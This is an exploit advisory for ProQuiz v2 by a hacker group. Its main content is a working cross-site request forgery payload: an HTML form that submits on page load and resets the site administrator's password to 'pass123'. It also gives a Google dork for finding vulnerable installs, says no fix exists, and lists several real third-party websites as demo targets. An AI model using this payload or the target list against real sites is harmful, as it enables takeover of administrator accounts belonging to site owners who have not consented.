facebook facebook twitter rss

ProQuiz v2.X.X CSRF (change admin passwd) Vulenrability

Author: TUNISIAN CYBER , Published: 14-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: ProQuiz v2.X.X CSRF (change admin passwd) Vulenrability
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor:http://proquiz.softon.org/
[+] Google Dork: intext:"Powered by - Softon Technologies"
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
I/Exloit:

</form>
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://127.0.0.1/[PATH]/functions.php?action=edit_profile&type=password">
<input type="hidden" name="password" value="pass123"/>
<input type="hidden" name="cpassword" value="pass123"/>
</form>
</body>
</html>

II/Fix:
No Fix Until now

Demo:
http://webexamiq.com/index.php
http://ticedu.fr/proquiz/
http://effchurch.org/pquiz/l
http://www.giup1tay.com/tracnghiem/
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :